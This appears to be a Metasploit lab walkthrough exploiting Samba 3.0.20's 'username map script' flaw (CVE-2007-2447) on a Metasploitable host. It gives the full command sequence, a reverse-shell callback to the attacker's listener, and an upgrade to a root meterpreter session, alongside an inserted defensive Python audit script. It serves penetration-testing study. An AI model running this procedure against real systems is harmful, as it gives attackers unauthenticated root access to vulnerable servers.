0x04-1 Server-side exploitation - Samba 3.0.20-Debian

Breaking into a Linux server

msf > services -c port,info -p 135,445
Services
========

host            port  info
----            ----  ----
192.168.10.122  135   Microsoft Windows RPC
192.168.10.122  445   Windows 2003 (build:3790) (name:ROOT-TVI862UBEH) (workgroup:WORKGROUP )
192.168.10.128  135   Microsoft Windows RPC
192.168.10.128  445   Windows XP SP3 (language:English) (name:DH-CA8822AB9589) (workgroup:WORKGROUP )
192.168.10.254  445   Unix (Samba 3.0.20-Debian)

# Now for the server at 192.168.10.254
Go to https://www.cvedetails.com and check whether Samba 3.0.20-Debian has a matching CVE number
# Search for a matching exploit module
msf > search cve:2007 type:exploit samba

Matching Modules
================

   Name                                       Disclosure Date  Rank       Description
   ----                                       ---------------  ----       -----------
   exploit/linux/samba/lsa_transnames_heap    2007-05-14       good       Samba lsa_io_trans_names Heap Overflow
   exploit/multi/samba/usermap_script         2007-05-14       excellent  Samba "username map script" Command Execution
   exploit/osx/samba/lsa_transnames_heap      2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   exploit/solaris/samba/lsa_transnames_heap  2007-05-14       average    Samba lsa_io_trans_names Heap Overflow


# Pick the module ranked excellent; it has the better chance of success
msf > use exploit/multi/samba/usermap_script 
# Show detailed information about this exploit
msf exploit(multi/samba/usermap_script) > info

       Name: Samba "username map script" Command Execution
     Module: exploit/multi/samba/usermap_script
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2007-05-14

Provided by:
  jduck 

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST  192.168.10.254   yes       The target address
  RPORT  139              yes       The target port (TCP)

Payload information:
  Space: 1024

Description:
  This module exploits a command execution vulnerability in Samba 
  versions 3.0.20 through 3.0.25rc3 when using the non-default 
  "username map script" configuration option. By specifying a username 
  containing shell meta characters, attackers can execute arbitrary 
  commands. No authentication is needed to exploit this vulnerability 
  since this option is used to map usernames prior to authentication!

References:
  https://cvedetails.com/cve/CVE-2007-2447/
  OSVDB (34700)
  http://www.securityfocus.com/bid/23972
  http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
  http://samba.org/samba/security/CVE-2007-2447.html
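The description above names two conditions for this module to apply: a Samba version between 3.0.20 and 3.0.25rc3, and the non-default "username map script" option being set. The following Python audit script, added here as an example and not part of the original post or of the Metasploit module, checks both against a version banner and an smb.conf text; the smb.conf contents and script paths are constructed, the banner is the one from the services scan above.

```python
import re

# Affected range as stated in the module description: 3.0.20 through 3.0.25rc3.
VULN_LOW, VULN_HIGH = (3, 0, 20), (3, 0, 25)  # only pre-release 3.0.25 builds affected

def parse_samba_version(banner):
    """Return (major, minor, patch, is_prerelease) from text such as
    'Unix (Samba 3.0.20-Debian)' or 'Samba 3.0.25rc3'; None if no version."""
    m = re.search(r"Samba\s+(\d+)\.(\d+)\.(\d+)([a-z]+\d*)?", banner)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2)), int(m.group(3)), m.group(4) is not None

def version_in_affected_range(banner):
    v = parse_samba_version(banner)
    if v is None:
        return False
    core, prerelease = v[:3], v[3]
    if core < VULN_LOW or core > VULN_HIGH:
        return False
    return prerelease if core == VULN_HIGH else True  # 3.0.25 final is fixed

def username_map_script_enabled(smb_conf):
    """True if [global] sets a non-empty 'username map script'. Samba matches option
    names case-insensitively, ignoring internal whitespace; '#' and ';' start comments."""
    section = None
    for raw in smb_conf.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "global" and "=" in line:
            key, value = line.split("=", 1)
            if re.sub(r"\s+", "", key).lower() == "usernamemapscript" and value.strip():
                return True
    return False

def exposed(banner, smb_conf):
    """Both conditions named in the module description must hold."""
    return version_in_affected_range(banner) and username_map_script_enabled(smb_conf)

# Constructed sample input: the banner from the scan above plus a hypothetical smb.conf.
SAMPLE_BANNER = "Unix (Samba 3.0.20-Debian)"
SAMPLE_SMB_CONF = """[global]
   workgroup = WORKGROUP
   ; username map script = /usr/local/bin/old_map.sh
   Username Map Script = /usr/local/bin/map_users.sh
"""
```

Calling exposed(SAMPLE_BANNER, SAMPLE_SMB_CONF) returns True for the sample; a host whose smb.conf leaves the option unset is not reachable by this module, though the version should still be patched.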

# Set the options and run it
msf exploit(multi/samba/usermap_script) > set rhost 192.168.10.254
rhost => 192.168.10.254
msf exploit(multi/samba/usermap_script) > exploit 

[*] Started reverse TCP double handler on 192.168.10.115:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo EPsE8hpgZPCxacgE;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "EPsE8hpgZPCxacgE\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.10.115:4444 -> 192.168.10.254:58722) at 2018-12-05 18:09:12 +0800

# A session has now been obtained; run a command in it
ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:7f:de:bf  
          inet addr:10.10.10.254  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe7f:debf/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:38716 errors:0 dropped:0 overruns:0 frame:0
          TX packets:547 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2543677 (2.4 MB)  TX bytes:72178 (70.4 KB)
          Interrupt:17 Base address:0x2000 

eth1      Link encap:Ethernet  HWaddr 00:0c:29:7f:de:c9  
          inet addr:192.168.10.254  Bcast:192.168.10.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe7f:dec9/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:47084 errors:1 dropped:1 overruns:0 frame:0
          TX packets:9312 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:3330608 (3.1 MB)  TX bytes:1689578 (1.6 MB)
          Interrupt:18 Base address:0x2080 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:4956 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4956 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:2376272 (2.2 MB)  TX bytes:2376272 (2.2 MB)

# Background the session (this does not close it)
Ctrl + Z

^Z
Background session 1? [y/N]  y
msf exploit(multi/samba/usermap_script) > 

# Show the help for the sessions command
msf exploit(multi/samba/usermap_script) > sessions -h
Usage: sessions [options] or sessions [id]

Active session manipulation and interaction.

OPTIONS:

    -C   Run a Meterpreter Command on the session given with -i, or all
    -K        Terminate all sessions
    -S   Row search filter.
    -c   Run a command on the session given with -i, or all
    -d        List all inactive sessions
    -h        Help banner
    -i   Interact with the supplied session ID
    -k   Terminate sessions by session ID and/or range
    -l        List all active sessions
    -n   Name or rename a session by ID
    -q        Quiet mode
    -s   Run a script or module on the session given with -i, or all
    -t   Set a response timeout (default: 15)
    -u   Upgrade a shell to a meterpreter session on many platforms
    -v        List all active sessions in verbose mode
    -x        Show extended information in the session table

Many options allow specifying session ranges using commas and dashes.
For example:  sessions -s checkvm -i 1,3-5  or  sessions -k 1-2,5,6

# Running sessions with no arguments lists all currently available sessions
msf exploit(multi/samba/usermap_script) > sessions 

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               192.168.10.115:4444 -> 192.168.10.254:58722 (192.168.10.254)

# Interact with a session
msf exploit(multi/samba/usermap_script) > sessions -i 1
[*] Starting interaction with 1...

# Close the session
Ctrl + C

^C
Abort session 1? If not, the foreground process in the session will be killed [y/N]  y
""

[*] 192.168.10.254 - Command shell session 1 closed.  Reason: User exit

About payloads

Attack payload
An exploit is like a key that opens a door; what happens once the door is open is the job of the payload.

Run show payload; by default msf selects a payload automatically
Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.10.115   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

The default is cmd/unix/reverse, which sends a reverse shell back over port 4444. Such a shell is usually limited in what it can do, so it should be upgraded to a meterpreter session.

# Upgrade the shell with the following command
sessions -u session_id

msf exploit(multi/samba/usermap_script) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.10.115:4433 
[*] Sending stage (861480 bytes) to 192.168.10.254
[*] Meterpreter session 2 opened (192.168.10.115:4433 -> 192.168.10.254:42658) at 2018-12-05 18:20:07 +0800
[*] Command stager progress: 100.00% (773/773 bytes)

# List the sessions

msf exploit(multi/samba/usermap_script) > sessions 

Active sessions
===============

  Id  Name  Type                   Information                                                Connection
  --  ----  ----                   -----------                                                ----------
  1         shell cmd/unix                                                                    192.168.10.115:4444 -> 192.168.10.254:39390 (192.168.10.254)
  2         meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0 @ metasploitable.localdomain  192.168.10.115:4433 -> 192.168.10.254:42658 (192.168.10.254)
